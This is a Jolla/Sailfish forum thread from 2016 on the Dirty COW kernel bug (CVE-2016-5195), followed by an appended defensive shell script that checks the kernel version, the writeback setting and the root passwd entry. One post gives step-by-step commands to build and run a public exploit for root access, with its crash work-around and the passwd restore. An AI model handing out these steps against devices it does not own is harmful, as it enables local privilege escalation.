[patch-request] Sailfish kernel and dirty cow CVE-2016-5195 [released]
... are there any thoughts about kernel patches like https://dirtycow.ninja? Is it possible?
So this means 1-2 months from now for those who don't use developer previews? When the bug is being exploited in the wild?
Federico ( 2016-11-02 19:50:58 +0300 )
@Federico The bug isn't remote-exploitable, so as long as you only install and use trustworthy software, the risks aren't that huge on a phone. Of course, if an attacker manages to get remote access to the user account, dirty cow could still be used to gain root, so the risks aren't negligible. All in all, I'm not that worried about this. Remote attacks on e.g. the broken wifi drivers are worse, imo. (Thanks for that, Qualcomm, and thanks for the free and swift bugfixes! Your products are really trustworthy, and I'm really looking forward to buying another device made with your chips again! /sarcasm)
Fuzzillogic ( 2016-11-02 23:01:54 +0300 )
I have compiled and tried the exploit on my Jolla C and it totally froze my phone, so I needed to pull the battery. This means there is no easy way to use this exploit on Jolla C :D
The Dirty Cow hack works very well on a Jolla. Dirty Cow has a well-known issue that crashes Linux unless you disable writeback, however that has a simple work-around.
To test on your own phone:
pkcon install gcc gcc-c++
git clone https://github.com/gbonacini/CVE-2016-5195.git
cd CVE-2016-5195/
make
./dcow ; su
Use: dirtyCowFun as your password
You are now root! However, to avoid an imminent crash, you must quickly also do:
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
This has all been run and verified on both my Jolla1 and my FairPhone2, so the exploit is very much valid for Sailfish!
Finally, to close the hole you just opened to get root, you should:
cp .ssh_bak /etc/passwd
WARNING! Unless you understand the details about /etc/passwd, you should not try this exploit: You risk opening your phone to the world! This will quickly result in your phone becoming a bot-net zombie for spammers, your ip added to all sorts of blacklists, and your battery being continuously drained to email hundreds of thousands of spam.
This very brilliantly demonstrates the need for an urgent kernel patch for the Jolla systems.
Richard
richardski ( 2016-10-31 12:56:00 +0300 )
Having seen how easy this is to exploit, I'm currently very nervous about connecting my phone to any network and fully agree that this should be fixed in an urgent kernel patch/hotfix release.
Frederik
FrederikF ( 2016-11-01 00:20:50 +0300 )
It's not quite that bad on a phone, since you have to log in with a user account before you can run the exploit. Usually, only the owner of the phone has an account on it. So, unless you have ssh enabled with a weak password, you should be OK. However, on a multi-user Linux server, it is a disaster!
That is true if you are sure that none of the applications you have installed is able to run unchecked code. (OK, we're talking about two separate exploits really, but then people have called me paranoid before, when it comes to computing)
FrederikF ( 2016-11-01 21:47:20 +0300 )
New Kernel 3.4.113 does include a patch. Now we have to wait until it shows up on devices...
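Added example, not code from the thread or from Jolla: a small POSIX shell script written from the defender's side that checks the three indicators this thread mentions, namely the kernel version against the 3.4.113 kernel the last comment says carries the fix, the dirty_writeback_centisecs value that richardski's post has to force to 0, and whether root's /etc/passwd entry still holds the shadow placeholder, since that post restores /etc/passwd from a backup. Assumptions: the 3.4.113 threshold is only applied to the 3.4 series, a stock system keeps "x" in root's password field, and the file paths are passed in so the checks can run on sample files.

```shell
#!/bin/sh
# Indicator checks for the Dirty COW (CVE-2016-5195) situation discussed in this thread.
# Constructed example, not code from the thread or from Jolla. Paths are parameters so the
# functions can be run against sample files as well as on a live device.
# Assumption taken from the thread: Sailfish kernel 3.4.113 carries the fix. Exit 0 when the
# version is 3.4.113 or later, 1 for an older 3.4 kernel, 2 for any other series (only the
# 3.4 kernel the thread is about is modelled; other series need their own fix level).
kernel_is_patched() {
    ver=$(printf '%s' "$1" | sed 's/[^0-9.].*//')   # drop "-jolla"-style suffixes
    maj=${ver%%.*}; rest=${ver#*.}
    min=${rest%%.*}; pat=${rest#*.}
    [ "$pat" = "$rest" ] && pat=0                    # "3.4" with no patch level
    pat=${pat%%.*}                                   # "113.1" -> 113
    [ "$maj" = 3 ] && [ "$min" = 4 ] || return 2
    [ "$pat" -ge 113 ]
}

# The thread notes the exploit only stays stable if dirty_writeback_centisecs is forced to 0.
# An unmodified device keeps a positive interval, so a 0 is worth flagging. Exit 0 if it is 0.
writeback_disabled() {
    [ "$(tr -d '[:space:]' < "$1")" = 0 ]
}

# The "cp .ssh_bak /etc/passwd" restore step above shows the dcow build rewrites root's
# passwd entry. Assumption: a stock system keeps the shadow placeholder "x" there, so any
# other value (or a missing root line) is flagged. Exit 0 when suspicious.
passwd_root_suspicious() {
    [ "$(awk -F: '$1 == "root" { print $2; exit }' "$1")" != "x" ]
}

# report KERNEL_VERSION WRITEBACK_FILE PASSWD_FILE: print findings, exit 0 only if clean.
report() {
    findings=0
    kernel_is_patched "$1" && rc=0 || rc=$?
    case $rc in
        0) echo "kernel $1: at or above 3.4.113" ;;
        1) echo "kernel $1: below 3.4.113, CVE-2016-5195 unpatched"; findings=$((findings + 1)) ;;
        *) echo "kernel $1: not a 3.4 series kernel, check its fix level separately" ;;
    esac
    if writeback_disabled "$2"; then
        echo "dirty_writeback_centisecs is 0: matches the exploit work-around"; findings=$((findings + 1))
    fi
    if passwd_root_suspicious "$3"; then
        echo "root entry in $3 lacks the shadow placeholder: inspect it and restore from backup"; findings=$((findings + 1))
    fi
    [ "$findings" -eq 0 ]
}

# On a device: report "$(uname -r)" /proc/sys/vm/dirty_writeback_centisecs /etc/passwd
```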
Asked: 2016-10-21 10:56:29 +0300
Seen: 2,134 times
Last updated: Nov 02 '16